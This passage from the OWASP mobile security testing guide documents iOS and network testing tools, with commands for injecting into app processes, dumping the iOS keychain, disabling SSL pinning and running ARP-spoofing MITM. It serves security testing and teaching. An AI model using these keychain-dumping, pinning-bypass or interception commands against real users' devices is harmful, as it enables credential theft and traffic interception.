Remember that on iOS, you can also benefit from the built-in tools provided when installing Frida, which include the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name a few.
There's a frida-trace
feature exclusive on iOS worth highlighting: tracing Objective-C APIs using the -m
flag and wildcards. For example, tracing all methods including \"HTTP\" in their name and belonging to any class whose name starts with \"NSURL\" is as easy as running:
frida-trace -U YourApp -m \"*[NSURL* *HTTP*]\"\n
For a quick start you can go through the iOS examples.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#installing-frida-on-ios","title":"Installing Frida on iOS","text":"To connect Frida to an iOS app, you need a way to inject the Frida runtime into that app. This is easy to do on a jailbroken device: just install frida-server
through Cydia. Once it has been installed, the Frida server will automatically run with root privileges, allowing you to easily inject code into any process.
Start Cydia and add Frida's repository by navigating to Manage -> Sources -> Edit -> Add and entering https://build.frida.re. You should then be able to find and install the Frida package.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#using-frida-on-ios","title":"Using Frida on iOS","text":"Connect your device via USB and make sure that Frida works by running the frida-ps
command and the flag '-U'. This should return the list of processes running on the device:
$ frida-ps -U\nPID Name\n--- ----------------\n963 Mail\n952 Safari\n416 BTServer\n422 BlueTool\n791 CalendarWidget\n451 CloudKeychainPro\n239 CommCenter\n764 ContactsCoreSpot\n(...)\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#frida-bindings","title":"Frida Bindings","text":"In order to extend the scripting experience, Frida offers bindings to programming languages such as Python, C, NodeJS, and Swift.
Taking Python as an example, the first thing to note is that no further installation steps are required. Start your Python script with import frida
and you're ready to go. See the following script that simply runs the previous JavaScript snippet:
# frida_python.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\nscript.load()\n\nsession.detach()\n
In this case, running the Python script (python3 frida_python.py
) has the same result as the previous example: it will print all methods of the android.view.View
class to the terminal. However, you might want to work with that data from Python. Using send
instead of console.log
will send data in JSON format from JavaScript to Python. Please read the comments in the example below:
# python3 frida_python_send.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\n# 1. we want to store method names inside a list\nandroid_view_methods = []\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n send(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\n\n# 2. this is a callback function, only method names containing \"Text\" will be appended to the list\ndef on_message(message, data):\n if \"Text\" in message['payload']:\n android_view_methods.append(message['payload'])\n\n# 3. we tell the script to run our callback each time a message is received\nscript.on('message', on_message)\n\nscript.load()\n\n# 4. we do something with the collected data, in this case we just print it\nfor method in android_view_methods:\n print(method)\n\nsession.detach()\n
This effectively filters the methods and prints only the ones containing the string \"Text\":
$ python3 frida_python_send.py\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic void android.view.View.setTextAlignment(int)\npublic void android.view.View.setTextDirection(int)\npublic void android.view.View.setTooltipText(java.lang.CharSequence)\n...\n
In the end, it is up to you to decide where would you like to work with the data. Sometimes it will be more convenient to do it from JavaScript and in other cases Python will be the best choice. Of course you can also send messages from Python to JavaScript by using script.post
. Refer to the Frida docs for more information about sending and receiving messages.
By running MobSF locally on a macOS host you'll benefit from a slightly better class-dump output.
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the IPA you want to analyze into the upload area and MobSF will start its job.
After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
Info.plist
file.Info.plist
which give some hints on the app's permissions.In contrast to the Android use case, MobSF does not offer any dynamic analysis features for iOS apps.
Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0041/","title":"nm - iOS","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for for iOS.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0042/","title":"BinaryCookieReader","text":"A tool to dump all the cookies from the binary Cookies.binarycookies file - https://github.com/as0ler/BinaryCookieReader/blob/master/BinaryCookieReader.py
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0043/","title":"class-dump","text":"class-dump by Steve Nygard is a command line utility for examining the Objective-C runtime information stored in Mach-O (Mach object) files. It generates declarations for the classes, categories, and protocols.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0044/","title":"class-dump-z","text":"class-dump-z is class-dump re-written from scratch in C++, avoiding the use of dynamic calls. Removing these unnecessary calls makes class-dump-z nearly 10 times faster than its predecessor.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0045/","title":"class-dump-dyld","text":"class-dump-dyld by Elias Limneos allows symbols to be dumped and retrieved directly from the shared cache, eliminating the necessity of extracting the files first. It can generate header files from app binaries, libraries, frameworks, bundles, or the whole dyld_shared_cache. Directories or the entirety of dyld_shared_cache can be recursively mass-dumped.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0046/","title":"Cycript","text":"Cydia Substrate (formerly called MobileSubstrate) is the standard framework for developing Cydia runtime patches (the so-called \"Cydia Substrate Extensions\") on iOS. It comes with Cynject, a tool that provides code injection support for C.
Cycript is a scripting language developed by Jay Freeman (aka Saurik). It injects a JavaScriptCore VM into a running process. Via the Cycript interactive console, users can then manipulate the process with a hybrid Objective-C++ and JavaScript syntax. Accessing and instantiating Objective-C classes inside a running process is also possible.
In order to install Cycript, first download, unpack, and install the SDK.
#on iphone\n$ wget https://cydia.saurik.com/api/latest/3 -O cycript.zip && unzip cycript.zip\n$ sudo cp -a Cycript.lib/*.dylib /usr/lib\n$ sudo cp -a Cycript.lib/cycript-apl /usr/bin/cycript\n
To spawn the interactive Cycript shell, run \"./cycript\" or \"cycript\" if Cycript is on your path.
$ cycript\ncy#\n
To inject into a running process, we first need to find the process ID (PID). Run the application and make sure the app is in the foreground. Running cycript -p <PID>
injects Cycript into the process. To illustrate, we will inject into SpringBoard (which is always running).
$ ps -ef | grep SpringBoard\n501 78 1 0 0:00.00 ?? 0:10.57 /System/Library/CoreServices/SpringBoard.app/SpringBoard\n$ ./cycript -p 78\ncy#\n
One of the first things you can try out is to get the application instance (UIApplication
), you can use Objective-C syntax:
cy# [UIApplication sharedApplication]\ncy# var a = [UIApplication sharedApplication]\n
Use that variable now to get the application's delegate class:
cy# a.delegate\n
Let's try to trigger an alert message on SpringBoard with Cycript.
cy# alertView = [[UIAlertView alloc] initWithTitle:@\"OWASP MASTG\" message:@\"Mobile Application Security Testing Guide\" delegate:nil cancelButtonitle:@\"OK\" otherButtonTitles:nil]\n#\"<UIAlertView: 0x1645c550; frame = (0 0; 0 0); layer = <CALayer: 0x164df160>>\"\ncy# [alertView show]\ncy# [alertView release]\n
Find the app's document directory with Cycript:
cy# [[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask][0]\n#\"file:///var/mobile/Containers/Data/Application/A8AE15EE-DC8B-4F1C-91A5-1FED35212DF/Documents/\"\n
The command [[UIApp keyWindow] recursiveDescription].toString()
returns the view hierarchy of keyWindow
. The description of every subview and sub-subview of keyWindow
is shown. The indentation space reflects the relationships between views. For example, UILabel
, UITextField
, and UIButton
are subviews of UIView
.
cy# [[UIApp keyWindow] recursiveDescription].toString()\n`<UIWindow: 0x16e82190; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x16e80ac0>; layer = <UIWindowLayer: 0x16e63ce0>>\n | <UIView: 0x16e935f0; frame = (0 0; 320 568); autoresize = W+H; layer = <CALayer: 0x16e93680>>\n | | <UILabel: 0x16e8f840; frame = (0 40; 82 20.5); text = 'i am groot!'; hidden = YES; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8f920>>\n | | <UILabel: 0x16e8e030; frame = (0 110.5; 320 20.5); text = 'A Secret Is Found In The ...'; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8e290>>\n | | <UITextField: 0x16e8fbd0; frame = (8 141; 304 30); text = ''; clipsToBounds = YES; opaque = NO; autoresize = RM+BM; gestureRecognizers = <NSArray: 0x16e94550>; layer = <CALayer: 0x16e8fea0>>\n | | | <_UITextFieldRoundedRectBackgroundViewNeue: 0x16e92770; frame = (0 0; 304 30); opaque = NO; autoresize = W+H; userInteractionEnabled = NO; layer = <CALayer: 0x16e92990>>\n | | <UIButton: 0x16d901e0; frame = (8 191; 304 30); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x16d90490>>\n | | | <UIButtonLabel: 0x16e72b70; frame = (133 6; 38 18); text = 'Verify'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e974b0>>\n | | <_UILayoutGuide: 0x16d92a00; frame = (0 0; 0 20); hidden = YES; layer = <CALayer: 0x16e936b0>>\n | | <_UILayoutGuide: 0x16d92c10; frame = (0 568; 0 0); hidden = YES; layer = <CALayer: 0x16d92cb0>>`\n
You can also use Cycript's built-in functions such as choose
which searches the heap for instances of the given Objective-C class:
cy# choose(SBIconModel)\n[#\"<SBIconModel: 0x1590c8430>\"]\n
Learn more in the Cycript Manual.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0047/","title":"Cydia","text":"Cydia is an alternative app store developed by Jay Freeman (aka \"saurik\") for jailbroken devices. It provides a graphical user interface and a version of the Advanced Packaging Tool (APT). You can easily access many \"unsanctioned\" app packages through Cydia. Most jailbreaks install Cydia automatically.
Many tools on a jailbroken device can be installed by using Cydia, which is the unofficial AppStore for iOS devices and allows you to manage repositories. In Cydia you should add (if not already done by default) the following repositories by navigating to Sources -> Edit, then clicking Add in the top left:
In case you are using the Sileo App Store, please keep in mind that the Sileo Compatibility Layer shares your sources between Cydia and Sileo, however, Cydia is unable to remove sources added in Sileo, and Sileo is unable to remove sources added in Cydia. Keep this in mind when you\u2019re trying to remove sources.
After adding all the suggested repositories above you can install the following useful packages from Cydia to get started:
installipa
and ipainstaller
which are both the same.Besides Cydia you can also ssh into your iOS device and you can install the packages directly via apt-get, like for example adv-cmds.
apt-get update\napt-get install adv-cmds\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0048/","title":"dsdump","text":"dsdump is a tool to dump Objective-C classes and Swift type descriptors (classes, structs, enums). It only supports Swift version 5 or higher and does not support ARM 32-bit binaries.
The following example shows how you can dump Objective-C classes and Swift type descriptors of an iOS application.
First verify if the app's main binary is a FAT binary containing ARM64:
$ otool -hv [APP_MAIN_BINARY_FILE]\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 39 5016 NOUNDEFS DYLDLINK TWOLEVEL PIE\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 38 5728 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
If yes, then we specify the \"--arch\" parameter to \"arm64\", otherwise it is not needed if the binary only contains an ARM64 binary.
# Dump the Objective-C classes to a temporary file\n$ dsdump --objc --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/OBJC.txt\n\n# Dump the Swift type descriptors to a temporary file if the app is implemented in Swift\n$ dsdump --swift --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/SWIFT.txt\n
You can find more information about the inner workings of dsdump and how to programmatically inspect a Mach-O binary to display the compiled Swift types and Objective-C classes in this article.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0049/","title":"Frida-cycript","text":"A fork of Cycript including a brand new runtime called Mj\u00f8lner powered by Frida. This enables frida-cycript to run on all the platforms and architectures maintained by frida-core - https://github.com/nowsecure/frida-cycript
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/","title":"Frida-ios-dump","text":"Frida-ios-dump is a Python script that helps you retrieve the decrypted version of an iOS app (IPA) from an iOS device. It supports both Python 2 and Python 3 and requires Frida running on your iOS device (jailbroken or not). This tool uses Frida's Memory API to dump the memory of the running app and recreate an IPA file. Because the code is extracted from memory, it is automatically decrypted.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/#alternatives","title":"Alternatives","text":"Bagbak is a Node.js script that decrypts the entire application, including its extensions. It serves the same purpose as frida-ios-dump, but you might find it easier to set up and more convenient for regular use.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0051/","title":"gdb","text":"A tool to perform runtime analysis of iOS applications - https://cydia.radare.org/pool/main/g/gdb/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0053/","title":"iOSbackup","text":"iOSbackup
is a Python 3 class that reads and extracts files from a password-encrypted iOS backup created by iTunes on Mac and Windows.
With ios-deploy you can install and debug iOS apps from the command line, without using Xcode. It can be installed via brew on macOS:
brew install ios-deploy\n
Alternatively:
git clone https://github.com/ios-control/ios-deploy.git\ncd ios-deploy/\nxcodebuild\ncd build/Release\n./ios-deploy\nln -s <your-path-to-ios-deploy>/build/Release/ios-deploy /usr/local/bin/ios-deploy\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0055/","title":"iProxy","text":"A tool used to connect via SSH to a jailbroken iPhone via USB - https://github.com/tcurdt/iProxy
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0056/","title":"Keychain-Dumper","text":"Keychain-dumper is an iOS tool to check which keychain items are available to an attacker once an iOS device has been jailbroken. The easiest way to get the tool is to download the binary from its GitHub repo and run it from your device:
$ git clone https://github.com/ptoomey3/Keychain-Dumper\n$ scp -P 2222 Keychain-Dumper/keychain_dumper root@localhost:/tmp/\n$ ssh -p 2222 root@localhost\niPhone:~ root# chmod +x /tmp/keychain_dumper\niPhone:~ root# /tmp/keychain_dumper\n
For usage instructions please refer to the Keychain-dumper GitHub page.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0057/","title":"lldb","text":"A debugger by Apple's Xcode used for debugging iOS applications - https://lldb.llvm.org/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0058/","title":"MachoOView","text":"MachoOView is a useful visual Mach-O file browser that also allows in-file editing of ARM binaries.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0059/","title":"optool","text":"optool is a tool which interfaces with MachO binaries in order to insert/remove load commands, strip code signatures, resign, and remove aslr.
To install it:
git clone https://github.com/alexzielenski/optool.git\ncd optool/\ngit submodule update --init --recursive\nxcodebuild\nln -s <your-path-to-optool>/build/Release/optool /usr/local/bin/optool\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0060/","title":"otool","text":"otool is a tool for displaying specific parts of object files or libraries. It works with Mach-O files and universal file formats.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0061/","title":"Grapefruit","text":"Grapefruit is an iOS app assessment tool that is using the Frida server on the iOS device and is abstracting many penetration testing tasks into a Web UI. It can be installed via npm
.
$ npm install -g igf\n$ grapefruit\nlistening on http://localhost:31337\n
When you execute the command grapefruit
a local server will be started on port 31337. Connect your jailbroken device with the Frida server running, or a non-jailbroken device with a repackaged app including Frida to your machine via USB. Once you click on the \"iPhone\" icon you will get an overview of all installed apps.
With Grapfruit it's possible to explore different kinds of information concerning an iOS app. Once you selected the iOS app you can perform many tasks such as:
A program that can convert .plist files between a binary version and an XML version - https://www.theiphonewiki.com/wiki/Plutil
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0063/","title":"security","text":"security
is a macOS command to administer Keychains, keys, certificates and the Security framework.
Since iOS 11 jailbreaks are introducing Sileo, which is a new jailbreak app-store for iOS devices. The jailbreak Chimera for iOS 12 is also relying on Sileo as a package manager.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0065/","title":"simctl","text":"simctl is an Xcode tool that allows you to interact with iOS simulators via the command line to e.g. manage simulators, launch apps, take screenshots or collect their logs.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0066/","title":"SSL Kill Switch 3","text":"Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and macOS Apps - https://github.com/NyaMisty/ssl-kill-switch3
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0067/","title":"swift-demangle","text":"swift-demangle is an Xcode tool that demangles Swift symbols. For more information run xcrun swift-demangle -help
once installed.
SwiftShield is a tool that generates irreversible, encrypted names for your iOS project's objects (including your Pods and Storyboards). This raises the bar for reverse engineers and will produce less helpful output when using reverse engineering tools such as class-dump and Frida.
Warning: SwiftShield irreversibly overwrites all your source files. Ideally, you should have it run only on your CI server, and on release builds.
A sample Swift project is used to demonstrate the usage of SwiftShield.
/usr/local/bin
:cp swiftshield/swiftshield /usr/local/bin/\n
$ cd SwiftSecurity\n$ swiftshield -automatic -project-root . -automatic-project-file SwiftSecurity.xcodeproj -automatic-project-scheme SwiftSecurity\nSwiftShield 3.4.0\nAutomatic mode\nBuilding project to gather modules and compiler arguments...\n-- Indexing ReverseEngineeringToolsChecker.swift --\nFound declaration of ReverseEngineeringToolsChecker (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC)\nFound declaration of amIReverseEngineered (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC20amIReverseEngineeredSbyFZ)\nFound declaration of checkDYLD (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC9checkDYLD33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\nFound declaration of checkExistenceOfSuspiciousFiles (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC31checkExistenceOfSuspiciousFiles33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\n...\n
SwiftShield is now detecting class and method names and is replacing their identifier with an encrypted value.
In the original source code you can see all the class and method identifiers:
SwiftShield was now replacing all of them with encrypted values that leave no trace to their original name or intention of the class/method:
After executing swiftshield
a new directory will be created called swiftshield-output
. In this directory another directory is created with a timestamp in the folder name. This directory contains a text file called conversionMap.txt
, that maps the encrypted strings to their original values.
$ cat conversionMap.txt\n//\n// SwiftShield Conversion Map\n// Automatic mode for SwiftSecurity, 2020-01-02 13.51.03\n// Deobfuscate crash logs (or any text file) by running:\n// swiftshield -deobfuscate CRASH_FILE -deobfuscate_map THIS_FILE\n//\n\nViewController ===> hTOUoUmUcEZUqhVHRrjrMUnYqbdqWByU\nviewDidLoad ===> DLaNRaFbfmdTDuJCPFXrGhsWhoQyKLnO\nsceneDidBecomeActive ===> SUANAnWpkyaIWlGUqwXitCoQSYeVilGe\nAppDelegate ===> KftEWsJcctNEmGuvwZGPbusIxEFOVcIb\nDeny_Debugger ===> lKEITOpOvLWCFgSCKZdUtpuqiwlvxSjx\nButton_Emulator ===> akcVscrZFdBBYqYrcmhhyXAevNdXOKeG\n
This is needed for deobfuscating encrypted crash logs.
Another example project is available in SwiftShield's Github repo, that can be used to test the execution of SwiftShield.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0069/","title":"Usbmuxd","text":"usbmuxd is a socket daemon that monitors USB iPhone connections. You can use it to map the mobile device's localhost listening sockets to TCP ports on your host computer. This allows you to conveniently SSH into your iOS device without setting up an actual network connection. When usbmuxd detects an iPhone running in normal mode, it connects to the phone and begins relaying requests that it receives via /var/run/usbmuxd
.
Xcode is an Integrated Development Environment (IDE) for macOS that contains a suite of tools for developing software for macOS, iOS, watchOS, and tvOS. You can download Xcode for free from the official Apple website. Xcode will offer you different tools and functions to interact with an iOS device that can be helpful during a penetration test, such as analyzing logs or sideloading of apps.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0071/","title":"Xcode Command Line Tools","text":"After installing Xcode, in order to make all development tools available systemwide, it is recommended to install the Xcode Command Line Tools package. This will be handy during testing of iOS apps as some of the tools (e.g. objection) are also relying on the availability of this package. You can download it from the official Apple website or install it straight away from your terminal:
xcode-select --install\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0072/","title":"xcrun","text":"xcrun
can be used invoke Xcode developer tools from the command-line, without having them in the path. For example you may want to use it to locate and run swift-demangle or simctl.
Radare2 is a complete framework for reverse-engineering and analyzing binaries. The installation instructions can be found in the GitHub repository. To learn more on radare2 you may want to read the official radare2 book.
Learn more:
Objection offers several features specific to iOS. You can find the full list of features on the project's page, but here are a few interesting ones:
All these tasks and more can be easily done by using the commands in objection's REPL. For example, you can obtain the classes used in an app, functions of classes or information about the bundles of an app by running:
OWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list classes\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list class_methods <ClassName>\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios bundles list_bundles\n
If you have a jailbroken device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to jailbreak the latest version of iOS, or you may have an application with advanced jailbreak detection mechanisms.
The ability to perform advanced dynamic analysis on non-jailbroken devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or get around basic security controls.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0074/#using-objection-on-ios","title":"Using Objection on iOS","text":"Starting up Objection depends on whether you've patched the IPA or whether you are using a jailbroken device running Frida-server. For running a patched IPA, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched IPA\n$ objection explore\n\n# Using frida-ps to get the correct application name\n$ frida-ps -Ua | grep -i Telegram\n983 Telegram\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"Telegram\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ ios sslpinning disable\n\n# Dump the Keychain\n$ ios keychain dump\n\n# Dump the Keychain, including access modifiers. The result will be written to the host in myfile.json\n$ ios keychain dump --json <myfile.json>\n\n# Show the content of a plist file\n$ ios plist cat <myfile.plist>\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0101/","title":"codesign","text":"The codesign tool is primarily used to create, verify, and display code signatures, and to query the dynamic status of signed code in the system. Although Xcode typically automates the process of signing code during builds and before distribution, there are scenarios where manual intervention with codesign is required. This can include inspecting or verifying the details of an app's code signature, or manually re-signing an app. For more detailed tasks such as these, you can use the codesign command line tool directly, as described in Apple's Code Signing Guide.
Learn more:
A command line packet capture utility for Android.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0076/","title":"bettercap","text":"A powerful framework which aims to offer to security researchers and reverse engineers an easy to use, all-in-one solution for Wi-Fi, Bluetooth Low Energy, wireless HID hijacking and Ethernet networks reconnaissance. It can be used during network penetration tests in order to simulate a man-in-the-middle (MITM) attack. This is achieved by executing ARP poisoning or spoofing to the target computers. When such an attack is successful, all packets between two computers are redirected to a third computer that acts as the man-in-the-middle and is able to intercept the traffic for analysis.
bettercap is a powerful tool to execute MITM attacks and should be preferred nowadays, instead of ettercap. See also Why another MITM tool? on the bettercap site.
bettercap is available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms. You need to install it on your host computer that will act as the MITM. On macOS it can be installed by using brew.
brew install bettercap\n
For Kali Linux you can install bettercap with apt-get
:
apt-get update\napt-get install bettercap\n
There are installation instructions as well for Ubuntu Linux 18.04 on LinuxHint.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0077/","title":"Burp Suite","text":"Burp Suite is an integrated platform for performing security testing mobile and web applications.
Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web servers. Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your device and host computer are connected to a Wi-Fi network that permits client-to-client traffic.
PortSwigger provides good tutorials on setting up both Android as iOS devices to work with Burp:
Please refer to the section \"Setting up an Interception Proxy\" in the Android and iOS \"Basic Security Testing\" chapters for more information.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0078/","title":"MITM Relay","text":"A script to intercept and modify non-HTTP protocols through Burp and others with support for SSL and STARTTLS interception - https://github.com/jrmdev/mitm_relay
"},{"location":"MASTG/tools/network/MASTG-TOOL-0079/","title":"OWASP ZAP","text":"OWASP ZAP (Zed Attack Proxy) is a free security tool which helps to automatically find security vulnerabilities in web applications and web services.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0080/","title":"tcpdump","text":"A command line packet capture utility - https://www.tcpdump.org/
"},{"location":"MASTG/tools/network/MASTG-TOOL-0081/","title":"Wireshark","text":"An open-source packet analyzer - https://www.wireshark.org/download.html
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/","title":"mitmproxy","text":"mitmproxy is a free and open source interactive HTTPS intercepting proxy.
mitmdump
is the command-line version of mitmproxy. Think tcpdump for HTTP. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. You can prettify and decode a variety of message types ranging from HTML to Protobuf, intercept specific messages on-the-fly, modify them before they reach their destination, and replay them to a client or server later on.mitmweb
is a web-based interface for mitmproxy. It gives you a similar experience as in Chrome's DevTools, plus additional features such as request interception and replay.brew install mitmproxy\n
The installation instructions are here.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/#usage","title":"Usage","text":"The documentation is here. Mitmproxy starts as a regular HTTP proxy by default and listens on http://localhost:8080
. You need to configure your browser or device to route all traffic through mitmproxy. For example, on Android emulator you need to follow the steps indicated here.
For example, to capture all traffic to a file:
mitmdump -w outfile\n
This runs mitmproxy with the add_header.py script, which simply adds a new header to all responses.
mitmdump -s add_header.py\n
"},{"location":"MASVS/","title":"OWASP MASVS","text":"GitHub Repo
The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security. It can be used by mobile software architects and developers seeking to develop secure mobile applications, as well as security testers to ensure completeness and consistency of test results.
Download the MASVS
Starting with MASVS v2.0.0, translations will no longer be included to focus on the development of MASTG v2.0.0. We encourage the community to create and maintain their own translations. Thank you to all the past translators who generously volunteered their time and expertise to make the MASVS accessible to non-English speaking communities. We truly appreciate your contributions and hope to continue working together in the future. The past MASVS v1.5.0 translations are still available in the MASVS repo.
"},{"location":"MASVS/#the-masvs-control-groups","title":"The MASVS Control Groups","text":"The standard is divided into various groups of controls, labeled MASVS-XXXXX, that represent the most critical areas of the mobile attack surface:
To complement the MASVS, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG) and the OWASP MAS Checklist which together are the perfect companion for verifying the controls listed in the OWASP MASVS and demonstrate compliance.
MAS Testing Profiles
Starting on v2.0.0 the MASVS does not contain \"verification levels\". The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. While we move things around and as a temporary measure, the OWASP MAS Checklist will still contain the old verification levels, associated with the current MASTG v1 tests. However, note that the levels will be completely reworked and reassigned to the corresponding MASTG tests in the next release.
"},{"location":"MASVS/05-MASVS-STORAGE/","title":"MASVS-STORAGE: Storage","text":"Mobile applications handle a wide variety of sensitive data, such as personally identifiable information (PII), cryptographic material, secrets, and API keys, that often need to be stored locally. This sensitive data may be stored in private locations, such as the app's internal storage, or in public folders that are accessible by the user or other apps installed on the device. However, sensitive data can also be unintentionally stored or exposed to publicly accessible locations, typically as a side-effect of using certain APIs or system capabilities such as backups or logs.
This category is designed to help developers ensure that any sensitive data intentionally stored by the app is properly protected, regardless of the target location. It also covers unintentional leaks that can occur due to improper use of APIs or system capabilities.
"},{"location":"MASVS/06-MASVS-CRYPTO/","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is essential for mobile apps because mobile devices are highly portable and can be easily lost or stolen. This means that an attacker who gains physical access to a device can potentially access all the sensitive data stored on it, including passwords, financial information, and personally identifiable information. Cryptography provides a means of protecting this sensitive data by encrypting it so that it cannot be easily read or accessed by an unauthorized user.
The purpose of the controls in this category is to ensure that the verified app uses cryptography according to industry best practices, which are typically defined in external standards such as NIST.SP.800-175B and NIST.SP.800-57. This category also focuses on the management of cryptographic keys throughout their lifecycle, including key generation, storage, and protection. Poor key management can compromise even the strongest cryptography, so it is crucial for developers to follow the recommended best practices to ensure the security of their users' sensitive data.
"},{"location":"MASVS/07-MASVS-AUTH/","title":"MASVS-AUTH: Authentication and Authorization","text":"Authentication and authorization are essential components of most mobile apps, especially those that connect to a remote service. These mechanisms provide an added layer of security and help prevent unauthorized access to sensitive user data. Although the enforcement of these mechanisms must be on the remote endpoint, it is equally important for the app to follow relevant best practices to ensure the secure use of the involved protocols.
Mobile apps often use different forms of authentication, such as biometrics, PIN, or multi-factor authentication code generators, to validate user identity. These mechanisms must be implemented correctly to ensure their effectiveness in preventing unauthorized access. Additionally, some apps may rely solely on local app authentication and may not have a remote endpoint. In such cases, it is critical to ensure that local authentication mechanisms are secure and implemented following industry best practices.
The controls in this category aim to ensure that the app implements authentication and authorization mechanisms securely, protecting sensitive user information and preventing unauthorized access. It is important to note that the security of the remote endpoint should also be validated using industry standards such as the OWASP Application Security Verification Standard (ASVS).
